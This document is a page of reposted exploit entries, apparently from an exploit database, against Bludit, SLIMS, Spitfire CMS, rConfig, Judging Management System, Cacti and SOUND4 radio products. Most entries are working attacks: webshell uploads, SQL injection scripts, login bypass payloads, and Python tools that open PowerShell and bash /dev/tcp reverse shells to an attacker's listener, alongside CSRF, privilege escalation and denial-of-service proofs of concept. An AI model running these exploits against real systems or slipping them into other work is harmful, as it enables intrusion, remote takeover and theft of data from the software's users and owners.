All posts by ISHACK AI BOT

  1. # Exploit Title: Bludit 3-14-1 Plugin 'UploadPlugin' - Remote Code Execution (RCE) (Authenticated)
     # Exploit Author: Alperen Ergel
     # Contact: @alpernae (IG/TW)
     # Software Homepage: https://www.bludit.com/
     # Version : 3-14-1
     # Tested on: windows 11 wampserver | Kali linux
     # Category: WebApp
     # Google Dork: intext:'2022 Powered by Bludit'
     # Date: 8.12.2022

     ######## Description ########
     #
     # Step 1 : Archive your webshell as a zip (example: payload.zip)
     # Step 2 : Log in to the admin account and download 'UploadPlugin'
     # Step 3 : Go to the UploadPlugin section
     # Step 4 : Upload your zip
     # Step 5 : target/bl-plugins/[your_payload]
     #
     ######## Proof of Concept ########

     ```http
     ==============> START REQUEST <========================================
     POST /admin/plugin/uploadplugin HTTP/2
     Host: localhost
     Cookie: BLUDIT-KEY=ri91q86hhp7mia1o8lrth63kc4
     User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
     Accept-Language: en-US,en;q=0.5
     Accept-Encoding: gzip, deflate
     Content-Type: multipart/form-data; boundary=---------------------------308003478615795926433430552264
     Content-Length: 1820
     Origin: https://036e-88-235-222-210.eu.ngrok.io
     Dnt: 1
     Referer: https://036e-88-235-222-210.eu.ngrok.io/admin/plugin/uploadplugin
     Upgrade-Insecure-Requests: 1
     Sec-Fetch-Dest: document
     Sec-Fetch-Mode: navigate
     Sec-Fetch-Site: same-origin
     Sec-Fetch-User: ?1
     Te: trailers

     -----------------------------308003478615795926433430552264
     Content-Disposition: form-data; name="tokenCSRF"

     b6487f985b68f2ac2c2d79b4428dda44696d6231
     -----------------------------308003478615795926433430552264
     Content-Disposition: form-data; name="pluginorthemes"

     plugins
     -----------------------------308003478615795926433430552264
     Content-Disposition: form-data; name="zip_file"; filename="a.zip"
     Content-Type: application/zip

     [binary zip archive body (a/a.php) omitted]
     ```
     ```http
     -----------------------------308003478615795926433430552264
     Content-Disposition: form-data; name="submit"

     Upload
     -----------------------------308003478615795926433430552264--
     ==============> END REQUEST <========================================
     ```

     ## WEB SHELL UPLOADED!

     ```http
     ==============> START RESPONSE <========================================
     HTTP/2 200 OK
     Cache-Control: no-store, no-cache, must-revalidate
     Content-Type: text/html; charset=UTF-8
     Date: Thu, 08 Dec 2022 18:01:43 GMT
     Expires: Thu, 19 Nov 1981 08:52:00 GMT
     Ngrok-Trace-Id: f3a92cc45b7ab0ae86e98157bb026ab4
     Pragma: no-cache
     Server: Apache/2.4.51 (Win64) PHP/7.4.26
     X-Powered-By: Bludit
     .
     .
     .
     .
     ==============> END RESPONSE <========================================
     ```

     # REQUEST THE WEB SHELL

     ```http
     ==============> START REQUEST <========================================
     GET /bl-plugins/a/a.php?cmd=whoami HTTP/2
     Host: localhost
     Cookie: BLUDIT-KEY=ri91q86hhp7mia1o8lrth63kc4
     User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
     Accept-Language: en-US,en;q=0.5
     Accept-Encoding: gzip, deflate
     Dnt: 1
     Upgrade-Insecure-Requests: 1
     Sec-Fetch-Dest: document
     Sec-Fetch-Mode: navigate
     Sec-Fetch-Site: none
     Sec-Fetch-User: ?1
     Te: trailers
     ==============> END REQUEST <========================================

     ==============> START RESPONSE <========================================
     HTTP/2 200 OK
     Content-Type: text/html; charset=UTF-8
     Date: Thu, 08 Dec 2022 18:13:14 GMT
     Ngrok-Trace-Id: 30639fc66dcf46ebe29cc45cf1bf3919
     Server: Apache/2.4.51 (Win64) PHP/7.4.26
     X-Powered-By: PHP/7.4.26
     Content-Length: 32

     <pre>nt authority\system
     </pre>
     ==============> END RESPONSE <========================================
     ```
  2. ## Exploit Title: Senayan Library Management System v9.0.0 - SQL Injection
     ## Author: nu11secur1ty
     ## Date: 11.09.2022
     ## Vendor: https://slims.web.id/web/
     ## Software: https://github.com/slims/slims9_bulian/releases/download/v9.0.0/slims9_bulian-9.0.0.zip
     ## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.0.0/SQLi

     ## Description:
     The manual insertion `point 3` with the `class` parameter appears to be vulnerable to SQL injection attacks. The payload '+(select load_file('\\\\0absu0byc9uwy8ivftx7f6auul0fo5cwfk6at2hr.again.com\\fbe'))+' was submitted in the manual insertion point 3. This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed.

     ## STATUS: HIGH Vulnerability

     [+] Payload:

     ```MySQL
     ---
     Parameter: class (GET)
         Type: boolean-based blind
         Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
         Payload: reportView=true&year=2002&class=bbbb''' RLIKE (SELECT (CASE WHEN (2547=2547) THEN 0x626262622727 ELSE 0x28 END)) AND 'dLjf'='dLjf&membershipType=a&collType=aaaa
     ---
     ```

     ## Reproduce:
     [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.0.0/SQLi)

     ## Proof and Exploit:
     [href](http://localhost:5001/sy5wji)

     ## Time spent
     `03:00:00`

     System Administrator - Infrastructure Engineer
     Penetration Testing Engineer
     Exploit developer at https://packetstormsecurity.com/https://cve.mitre.org/index.html and https://www.exploit-db.com/
     home page: https://www.nu11secur1ty.com/
     hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
     nu11secur1ty <http://nu11secur1ty.com/>
  3. # Exploit Title: Spitfire CMS 1.0.475 - PHP Object Injection
     # Exploit Author: LiquidWorm

     Vendor: Claus Muus
     Product web page: http://spitfire.clausmuus.de
     Affected version: 1.0.475

     Summary: Spitfire is a system to manage the content of webpages.

     Desc: The application is prone to a PHP Object Injection vulnerability due to the unsafe use of the unserialize() function. A potential attacker, authenticated, could exploit this vulnerability by sending specially crafted requests to the web application containing malicious serialized input.

     -----------------------------------------------------------------------
     cms/edit/tpl_backup.inc.php:
     ----------------------------

     ```
     47: private function status ()
     48: {
     49:     $status = array ();
     50:
     51:     $status['values'] = array ();
     52:     $status['values'] = isset ($_COOKIE['cms_backup_values']) ? unserialize ($_COOKIE['cms_backup_values']) : array ();
     ...
     ...
     77: public function save ($values)
     78: {
     79:     $values = array_merge ($this->status['values'], $values);
     80:     setcookie ('cms_backup_values', serialize ($values), time()+60*60*24*30);
     81: }
     ```
     -----------------------------------------------------------------------

     Tested on: nginx

     Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
     @zeroscience

     Advisory ID: ZSL-2022-5720
     Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5720.php

     28.09.2022

     --

     ```bash
     > curl -isk -XPOST http://10.0.0.2/cms/edit/tpl_backup_action.php \
       -H 'Content-Type: application/x-www-form-urlencoded' -H 'Accept: */*' -H 'Referer: http://10.0.0.2/cms/edit/cont_index.php?tpl=backup' -H 'Accept-Encoding: gzip, deflate' -H 'Accept-Language: en-US,en;q=0.9' -H 'Connection: close' \
       -H 'Cookie: tip=0; cms_backup_values=O%3a3%3a%22ZSL%22%3a0%3a%7b%7d; cms_username=admin; PHPSESSID=0e63d3a8762f4bff95050d1146db8c1c' \
       --data 'action=save&&value=1'
       #--data 'action=save&&value[files]={}'
     ```
  4. # Exploit Title: rconfig 3.9.7 - Sql Injection (Authenticated)
     # Exploit Author: azhen
     # Date: 10/12/2022
     # Vendor Homepage: https://www.rconfig.com/
     # Software Link: https://www.rconfig.com/
     # Vendor: rConfig
     # Version: <= v3.9.7
     # Tested against Server Host: Linux
     # CVE: CVE-2022-45030

     ```python
     import requests
     import sys
     import urllib3

     urllib3.disable_warnings()
     s = requests.Session()

     # sys.argv.append("192.168.10.150") #Enter the hostname
     if len(sys.argv) != 2:
         print("Usage: python3 rconfig_sqli_3.9.7.py <host>")
         sys.exit(1)
     host=sys.argv[1] #Enter the hostname

     def get_data(host):
         print("[+] Get db data...")
         vul_url = "https://"+host+":443/lib/ajaxHandlers/ajaxCompareGetCmdDates.php?deviceId=-1&command='+union+select+concat(1000%2bord(substr({},{},1)),'-1-1')%20--%20"
         query_exp = "database()"
         result_data = ""
         for i in range(1, 100):
             burp0_headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:86.0) Gecko/20100101 Firefox/86.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate"}
             res = requests.get(vul_url.format(query_exp, i), cookies=s.cookies,verify=False)
             # print(res.text)
             a = chr(int(res.text[6:10]) - 1000)
             if a == '\x00':
                 break
             result_data += a
             print(result_data)
         print("[+] Database name: {}".format(result_data))

     '''
     output:
     [+] Logging in...
     [+] Get db data...
     r
     rc
     rco
     rcon
     rconf
     rconfi
     rconfig
     rconfigd
     rconfigdb
     [+] Database name: rconfigdb
     '''

     def login(host):
         print("[+] Logging in...")
         url = "https://"+host+":443/lib/crud/userprocess.php"
         headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:86.0) Gecko/20100101 Firefox/86.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "https://demo.rconfig.com", "Connection": "close", "Referer": "https://demo.rconfig.com/login.php", "Upgrade-Insecure-Requests": "1"}
         data = {"user": "admin", "pass": "admin", "sublogin": "1"} #Use valid set of credentials default is set to admin/admin
         response=s.post(url, headers=headers, cookies=s.cookies, data=data, verify=False)
         get_data(host)

     login(host)
     ```
  5. # Exploit Title: Judging Management System v1.0 - Remote Code Execution (RCE)
     # Date: 12/11/2022
     # Exploit Author: Angelo Pio Amirante
     # Vendor Homepage: https://www.sourcecodester.com/
     # Software Link: https://www.sourcecodester.com/php/15910/judging-management-system-using-php-and-mysql-free-source-code.html
     # Version: 1.0
     # Tested on: Windows 10 on XAAMP server

     ```python
     import requests,argparse,re,time,base64
     import urllib.parse
     from colorama import (Fore as F,Back as B,Style as S)
     from bs4 import BeautifulSoup

     BANNER = """
     ╔═══════════════════════════════════════════════════════════════════════════════════════════════════════╗
     ║ Judging Management System v1.0 - Auth Bypass + Unrestricted File Upload = Remote Code Execution (RCE) ║
     ╚═══════════════════════════════════════════════════════════════════════════════════════════════════════╝
     """

     def argsetup():
         desc = S.BRIGHT + 'Judging Management System v1.0 - Remote Code Execution (RCE)'
         parser = argparse.ArgumentParser(description=desc)
         parser.add_argument('-t', '--target', help='Target URL, Ex: http://localhost/php-jms', required=True)
         parser.add_argument('-l', '--listenip', help='Listening address required to receive reverse shell', required=True)
         parser.add_argument('-lp','--listenport', help='Listening port required to receive reverse shell', required=True)
         args = parser.parse_args()
         return args

     # Performs Auth bypass in order to get the admin cookie
     def auth_bypass(args):
         print(F.CYAN+"[+] Login into the application through Auth Bypass vulnerability...")
         session = requests.Session()
         loginUrl = f"{args.target}/login.php"
         username = """' OR 1=1-- -"""
         password = "randomvalue1234"
         data = {'username': username, 'password': password}
         login = session.post(loginUrl,verify=False,data=data)
         admin_cookie = login.cookies['PHPSESSID']
         print(F.GREEN+"[+] Admin cookies obtained !!!")
         return admin_cookie

     # Checks if the file has been uploaded to /uploads directory
     def check_file(args,cookie):
         uploads_endpoint = f"{args.target}/uploads/"
         cookies = {'PHPSESSID': f'{cookie}'}
         req = requests.get(uploads_endpoint,verify=False,cookies=cookies)
         soup = BeautifulSoup(req.text,features='html.parser')
         files = soup.find_all("a")
         for i in range (len(files)):
             match = re.search(".*-shelljudgesystem\.php",files[i].get('href'))
             if match:
                 file = files[i].get('href')
                 print(F.CYAN+"[+] The webshell is at the following Url: "+f"{args.target}/uploads/"+file)
                 return file
         return None

     def file_upload(args,cookie):
         now = int(time.time())
         endpoint = f"{args.target}/edit_organizer.php"
         cookies = {'wp-settings-time-1':f"{now}",'PHPSESSID': f'{cookie}'}
         get_req = requests.get(endpoint,verify=False,cookies=cookies)
         soup = BeautifulSoup(get_req.text,features='html.parser')
         username = soup.find("input",{"name":"username"}).get('value')
         admin_password = soup.find("input",{"id":"password"}).get('value')
         print(F.GREEN + "[+] Admin username: " + username)
         print(F.GREEN + "[+] Admin password: " + admin_password)
         # Multi-part request
         file_dict = {
             'fname':(None,"Random"),
             'mname':(None,"Random"),
             'lname':(None,"Random"),
             'email':(None,"[email protected]"),
             'pnum':(None,"014564343"),
             'cname':(None,"Random"),
             'caddress':(None,"Random"),
             'ctelephone':(None,"928928392"),
             'cemail':(None,"[email protected]"),
             'cwebsite':(None,"http://company.com"),
             'file':("shelljudgesystem.php","<?php system($_REQUEST['cmd']) ?>","application/octet-stream"),
             'username':(None,f"{admin_password}"),
             'passwordx':(None,f"{admin_password}"),
             'password2x':(None,f"{admin_password}"),
             'password':(None,f"{admin_password}"),
             'update':(None,"")
         }
         req = requests.post(endpoint,verify=False,cookies=cookies,files=file_dict)

     def exploit(args,cookie,file):
         payload = f"""powershell+-nop+-c+"$client+%3d+New-Object+System.Net.Sockets.TCPClient('{args.listenip}',{args.listenport})%3b"""+"""$stream+%3d+$client.GetStream()%3b[byte[]]$bytes+%3d+0..65535|%25{0}%3bwhile(($i+%3d+$stream.Read($bytes,+0,+$bytes.Length))+-ne+0){%3b$data+%3d+(New-Object+-TypeName+System.Text.ASCIIEncoding).GetString($bytes,0,+$i)%3b$sendback+%3d+(iex+$data+2>%261+|+Out-String+)%3b$sendback2+%3d+$sendback+%2b+'PS+'+%2b+(pwd).Path+%2b+'>+'%3b$sendbyte+%3d+([text.encoding]%3a%3aASCII).GetBytes($sendback2)%3b$stream.Write($sendbyte,0,$sendbyte.Length)%3b$stream.Flush()}%3b$client.Close()" """
         uploads_endpoint = f"{args.target}/uploads/{file}?cmd={payload}"
         cookies = {'PHPSESSID': f'{cookie}'}
         print(F.GREEN + "\n[+] Enjoy your reverse shell ")
         requests.get(uploads_endpoint,verify=False,cookies=cookies)

     if __name__ == '__main__':
         print(F.CYAN + BANNER)
         args = argsetup()
         cookie=auth_bypass(args=args)
         file_upload(args=args,cookie=cookie)
         file_name=check_file(args=args,cookie=cookie)
         if file_name is not None:
             exploit(args=args,cookie=cookie,file=file_name)
         else:
             print(F.RED + "[!] File not found")
     ```
  6. # Exploit Title: Judging Management System v1.0 - Authentication Bypass
     # Date: 12/11/2022
     # Exploit Author: Angelo Pio Amirante
     # Vendor Homepage: https://www.sourcecodester.com/
     # Software Link: https://www.sourcecodester.com/php/15910/judging-management-system-using-php-and-mysql-free-source-code.html
     # Version: 1.0
     # Tested on: Windows 10 on XAAMP server
     # Vulnerability: An attacker can bypass the login page and access the dashboard page
     # Vulnerable file: login.php

     # Exploit:
     1) Go to: http://localhost/php-jms/index.php
     2) As username use this payload: 'or 1=1-- -
     3) Use random words for the password

     ```http
     POST /php-jms/login.php HTTP/1.1
     Host: localhost
     User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0
     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
     Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
     Accept-Encoding: gzip, deflate
     Content-Type: application/x-www-form-urlencoded
     Content-Length: 37
     Origin: http://localhost
     Connection: close
     Referer: http://localhost/php-jms/index.php
     Cookie: wp-settings-time-1=1669938282; _pk_id.1.1fff=9c7644c9d84f46f1.1670232782.
     Upgrade-Insecure-Requests: 1
     Sec-Fetch-Dest: document
     Sec-Fetch-Mode: navigate
     Sec-Fetch-Site: same-origin
     Sec-Fetch-User: ?1

     username=%27or+1%3D1--+-&password=asa
     ```
  7. # Exploit Title: Cacti v1.2.22 - Remote Command Execution (RCE)
     # Exploit Author: Riadh BOUCHAHOUA
     # Discovery Date: 2022-12-08
     # Vendor Homepage: https://www.cacti.net/
     # Software Links : https://github.com/Cacti/cacti
     # Tested Version: 1.2.2x <= 1.2.22
     # CVE: CVE-2022-46169
     # Tested on OS: Debian 10/11

     ```python
     #!/usr/bin/env python3
     import random
     import httpx, urllib

     class Exploit:
         def __init__(self, url, proxy=None, rs_host="",rs_port=""):
             self.url = url
             self.session = httpx.Client(headers={"User-Agent": self.random_user_agent()},verify=False,proxies=proxy)
             self.rs_host = rs_host
             self.rs_port = rs_port

         def exploit(self):
             # cacti local ip from the url for the X-Forwarded-For header
             local_cacti_ip = self.url.split("//")[1].split("/")[0]
             headers = {
                 'X-Forwarded-For': f'{local_cacti_ip}'
             }
             revshell = f"bash -c 'exec bash -i &>/dev/tcp/{self.rs_host}/{self.rs_port} <&1'"
             import base64
             b64_revshell = base64.b64encode(revshell.encode()).decode()
             payload = f";echo {b64_revshell} | base64 -d | bash -"
             payload = urllib.parse.quote(payload)
             urls = []
             # Adjust the range to fit your needs ( wider the range, longer the script will take to run the more success you will have achieving a reverse shell)
             for host_id in range(1,100):
                 for local_data_ids in range(1,100):
                     urls.append(f"{self.url}/remote_agent.php?action=polldata&local_data_ids[]={local_data_ids}&host_id={host_id}&poller_id=1{payload}")
             for url in urls:
                 r = self.session.get(url,headers=headers)
                 print(f"{r.status_code} - {r.text}" )
             pass

         def random_user_agent(self):
             ua_list = [
                 "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",
                 "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0",
             ]
             return random.choice(ua_list)

     def parse_args():
         import argparse
         argparser = argparse.ArgumentParser()
         argparser.add_argument("-u", "--url", help="Target URL (e.g. http://192.168.1.100/cacti)")
         argparser.add_argument("-p", "--remote_port", help="reverse shell port to connect to", required=True)
         argparser.add_argument("-i", "--remote_ip", help="reverse shell IP to connect to", required=True)
         return argparser.parse_args()

     def main() -> None:
         # Open a nc listener (rs_host+rs_port) and run the script against a CACTI server with its LOCAL IP URL
         args = parse_args()
         e = Exploit(args.url, rs_host=args.remote_ip, rs_port=args.remote_port)
         e.exploit()

     if __name__ == "__main__":
         main()
     ```
  8. # Exploit Title: SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Cross-Site Request Forgery
     # Exploit Author: LiquidWorm

     Vendor: SOUND4 Ltd.
     Product web page: https://www.sound4.com | https://www.sound4.biz
     Affected version:
       FM/HD Radio Processing:
         Impact/Pulse/First (Version 2: 1.1/2.15)
         Impact/Pulse/First (Version 1: 2.1/1.69)
         Impact/Pulse Eco 1.16
       Voice Processing:
         BigVoice4 1.2
         BigVoice2 1.30
       Web-Audio Streaming:
         Stream 1.1/2.4.29
       Watermarking:
         WM2 (Kantar Media) 1.11

     Summary: The SOUND4 IMPACT introduces an innovative process - mono and stereo parts of the signal are processed separately to obtain perfect consistency in terms of both sound and level. Therefore, in moving reception, when the FM receiver switches from stereo to mono and back to stereo, the sound variations and changes in level are reduced by over 90%. In the SOUND4 IMPACT processing chain, the stereo expander can be used substantially without any limitations.

     With its advanced functionalities and impressive versatility, SOUND4 PULSE gives clients the ultimate price - performance ratio, providing much more than just a processor. Flexible and powerful, it ensures perfect sound quality and full compatibility with radio broadcasting standards and can be used simultaneously for FM and HD, DAB, DRM or streaming.

     SOUND4 FIRST provides all the most important functionalities you need in an FM/HD processor and sets the bar high both in terms of performance and affordability. Designed to deliver a sound of uncompromising quality, this tool gives you 2-band processing, a digital stereo generator and an IMPACT Clipper.

     Desc: The application interface allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site.

     Tested on: Apache/2.4.25 (Unix)
                OpenSSL/1.0.2k
                PHP/7.1.1
                GNU/Linux 5.10.43 (armv7l)
                GNU/Linux 4.9.228 (armv7l)

     Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
     Macedonian Information Security Research and Development Laboratory
     Zero Science Lab - https://www.zeroscience.mk - @zeroscience

     Advisory ID: ZSL-2022-5722
     Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5722.php

     26.09.2022

     --

     PoC:
     ----

     ```html
     <form action="http://RADIO/cgi-bin/logoremove.cgi" method="POST">
       <input type="submit" value="Disappear" />
     </form>
     ```
  9. # Exploit Title: SOUND4 Server Service 4.1.102 - Local Privilege Escalation
     # Exploit Author: LiquidWorm

     Vendor: SOUND4 Ltd.
     Product web page: https://www.sound4.com | https://www.sound4.biz
     Affected version: 4.1.102

     Summary: SOUND4 Windows Server Service.

     Desc: The application suffers from an unquoted search path issue impacting the service 'SOUND4 Server' for Windows. This could potentially allow an authorized but non-privileged local user to execute arbitrary code with elevated privileges on the system. A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

     Tested on: Windows 10 Home 64 bit (build 9200)
                SOUND4 Server v4.1.102
                SOUND4 Remote Control v4.3.17

     Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
     Macedonian Information Security Research and Development Laboratory
     Zero Science Lab - https://www.zeroscience.mk - @zeroscience

     Advisory ID: ZSL-2022-5721
     Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5721.php

     26.09.2022

     --

     ```
     C:\>sc qc "SOUND4 Server"
     [SC] QueryServiceConfig SUCCESS

     SERVICE_NAME: SOUND4 Server
             TYPE               : 10  WIN32_OWN_PROCESS
             START_TYPE         : 2   AUTO_START
             ERROR_CONTROL      : 1   NORMAL
             BINARY_PATH_NAME   : C:\Program Files\SOUND4\Server\SOUND4 Server.exe --service
             LOAD_ORDER_GROUP   :
             TAG                : 0
             DISPLAY_NAME       : SOUND4 Server
             DEPENDENCIES       :
             SERVICE_START_NAME : LocalSystem

     C:\>cacls "C:\Program Files\SOUND4\Server\SOUND4 Server.exe"
     C:\Program Files\SOUND4\Server\SOUND4 Server.exe NT AUTHORITY\SYSTEM:(ID)F
                                                      BUILTIN\Administrators:(ID)F
                                                      BUILTIN\Users:(ID)R
                                                      APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(ID)R
                                                      APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(ID)R

     C:\Program Files\SOUND4\Server>"SOUND4 Server.exe" -V
     4.1.102
     ```
  10. # Exploit Title: SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Authorization Bypass (IDOR)
      # Exploit Author: LiquidWorm

      Vendor: SOUND4 Ltd.
      Product web page: https://www.sound4.com | https://www.sound4.biz
      Affected version:
        FM/HD Radio Processing:
          Impact/Pulse/First (Version 2: 1.1/2.15)
          Impact/Pulse/First (Version 1: 2.1/1.69)
          Impact/Pulse Eco 1.16
        Voice Processing:
          BigVoice4 1.2
          BigVoice2 1.30
        Web-Audio Streaming:
          Stream 1.1/2.4.29
        Watermarking:
          WM2 (Kantar Media) 1.11

      Summary: The SOUND4 IMPACT introduces an innovative process - mono and stereo parts of the signal are processed separately to obtain perfect consistency in terms of both sound and level. Therefore, in moving reception, when the FM receiver switches from stereo to mono and back to stereo, the sound variations and changes in level are reduced by over 90%. In the SOUND4 IMPACT processing chain, the stereo expander can be used substantially without any limitations.

      With its advanced functionalities and impressive versatility, SOUND4 PULSE gives clients the ultimate price - performance ratio, providing much more than just a processor. Flexible and powerful, it ensures perfect sound quality and full compatibility with radio broadcasting standards and can be used simultaneously for FM and HD, DAB, DRM or streaming.

      SOUND4 FIRST provides all the most important functionalities you need in an FM/HD processor and sets the bar high both in terms of performance and affordability. Designed to deliver a sound of uncompromising quality, this tool gives you 2-band processing, a digital stereo generator and an IMPACT Clipper.

      Desc: The application is vulnerable to insecure direct object references that occur when the application provides direct access to objects based on user-supplied input. As a result of this vulnerability attackers can bypass authorization and access the hidden resources on the system and execute privileged functionalities.

      Tested on: Apache/2.4.25 (Unix)
                 OpenSSL/1.0.2k
                 PHP/7.1.1
                 GNU/Linux 5.10.43 (armv7l)
                 GNU/Linux 4.9.228 (armv7l)

      Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
      Macedonian Information Security Research and Development Laboratory
      Zero Science Lab - https://www.zeroscience.mk - @zeroscience

      Advisory ID: ZSL-2022-5723
      Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5723.php

      26.09.2022

      --

      (GET|POST) /** HTTP/1.1

      /var/www/:
      ----------
      ```
      .SOUND4
      about.php
      actioninprogress.php
      broken_error.php
      cfg_filewatch.xml
      cfg_filewatch_specific.xml
      checklogin.php
      checkserver.php
      config.php
      datahandlerdlg.php
      descrxml.php
      dns.php
      downloads
      downloads.php
      fullrebootsystem.php
      global.php
      globaljs.php
      guifactorysettings.xml
      guixml.php
      guixml_error.php
      header.php
      images
      index.php
      isreboot.php
      jquery-3.2.1.min.js
      jquery-plugins
      jquery-ui-custom
      jquery-ui-i18n.js
      jquery-ui.css
      jquery-ui.js
      jquery.js
      jquery.ui.touch-punch.min.js
      killffmpeg.php
      linkandshare.php
      login.php
      logout.php
      monitor.php
      networkdiagnostic.php
      partialrebootsystem.php
      ping.php
      playercfg.xml
      rebootsystem.php
      restoreinprogress.php
      script.min.js
      secure.php
      serverinprogress.php
      settings.php
      setup.php
      setup_ethernet.php
      style.min.css
      traceroute.php
      upgrade
      upgrade.php
      upgradeinprogress.php
      uploaded_guicustomload.php
      uploaded_kantarlic.php
      uploaded_licfile.php
      uploaded_logo.php
      uploaded_presetfile.php
      uploaded_restorefile.php
      uploaded_upgfile.php
      validate_tz.php
      ws.min.js
      ws.php
      wsjquery-class.min.js
      www-data-handler.php
      ```

      /usr/cgi-bin/:
      --------------
      (GET|POST) /** HTTP/1.1

      ```
      backup.cgi
      cgi-form-data
      downloadkantarlic.cgi
      ffmpeg.cgi
      frontpanel
      getlogs.cgi
      getlogszip.cgi
      guicustomsettings.cgi
      guicustomsettingsload.cgi
      guifactorysettings.cgi
      importpreset.cgi
      loghandler.php
      logo
      logoremove.cgi
      logoupload.cgi
      phptail.php
      printenv
      printenv.vbs
      printenv.wsf
      restore.cgi
      restorefactory.cgi
      test-cgi
      upgrade.cgi
      upload.cgi
      ```
  11. # Exploit Title: SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Denial Of Service (DoS)
      # Exploit Author: LiquidWorm

      Vendor: SOUND4 Ltd.
      Product web page: https://www.sound4.com | https://www.sound4.biz
      Affected version:
        FM/HD Radio Processing:
          Impact/Pulse/First (Version 2: 1.1/2.15)
          Impact/Pulse/First (Version 1: 2.1/1.69)
          Impact/Pulse Eco 1.16
        Voice Processing:
          BigVoice4 1.2
          BigVoice2 1.30
        Web-Audio Streaming:
          Stream 1.1/2.4.29
        Watermarking:
          WM2 (Kantar Media) 1.11

      Summary: The SOUND4 IMPACT introduces an innovative process - mono and stereo parts of the signal are processed separately to obtain perfect consistency in terms of both sound and level. Therefore, in moving reception, when the FM receiver switches from stereo to mono and back to stereo, the sound variations and changes in level are reduced by over 90%. In the SOUND4 IMPACT processing chain, the stereo expander can be used substantially without any limitations.

      With its advanced functionalities and impressive versatility, SOUND4 PULSE gives clients the ultimate price - performance ratio, providing much more than just a processor. Flexible and powerful, it ensures perfect sound quality and full compatibility with radio broadcasting standards and can be used simultaneously for FM and HD, DAB, DRM or streaming.

      SOUND4 FIRST provides all the most important functionalities you need in an FM/HD processor and sets the bar high both in terms of performance and affordability. Designed to deliver a sound of uncompromising quality, this tool gives you 2-band processing, a digital stereo generator and an IMPACT Clipper.

      Desc: The application allows an unauthenticated attacker to disconnect the current monitoring user from listening/monitoring and take over the radio stream on a specific channel.

      ------------------------------------------------------------------------
      /var/www/killffmpeg.php:
      ------------------------
      ```php
      <?php
      $ret=0;
      exec("bash -c 'kill $(cat /tmp/webplay.pid)'",$out,$ret);
      echo $ret;
      ?>
      ```
      ------------------------------------------------------------------------

      Tested on: Apache/2.4.25 (Unix)
                 OpenSSL/1.0.2k
                 PHP/7.1.1
                 GNU/Linux 5.10.43 (armv7l)
                 GNU/Linux 4.9.228 (armv7l)

      Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
      Macedonian Information Security Research and Development Laboratory
      Zero Science Lab - https://www.zeroscience.mk - @zeroscience

      Advisory ID: ZSL-2022-5725
      Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5725.php

      26.09.2022

      --

      ```bash
      > curl -sko -nul https://RADIO/killffmpeg.php
      ```
  12. # Exploit Title: SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Authentication Bypass
      # Exploit Author: LiquidWorm

      Vendor: SOUND4 Ltd.
      Product web page: https://www.sound4.com | https://www.sound4.biz
      Affected version:
        FM/HD Radio Processing:
          Impact/Pulse/First (Version 2: 1.1/2.15)
          Impact/Pulse/First (Version 1: 2.1/1.69)
          Impact/Pulse Eco 1.16
        Voice Processing:
          BigVoice4 1.2
          BigVoice2 1.30
        Web-Audio Streaming:
          Stream 1.1/2.4.29
        Watermarking:
          WM2 (Kantar Media) 1.11

      Summary: The SOUND4 IMPACT introduces an innovative process - mono and stereo parts of the signal are processed separately to obtain perfect consistency in terms of both sound and level. Therefore, in moving reception, when the FM receiver switches from stereo to mono and back to stereo, the sound variations and changes in level are reduced by over 90%. In the SOUND4 IMPACT processing chain, the stereo expander can be used substantially without any limitations.

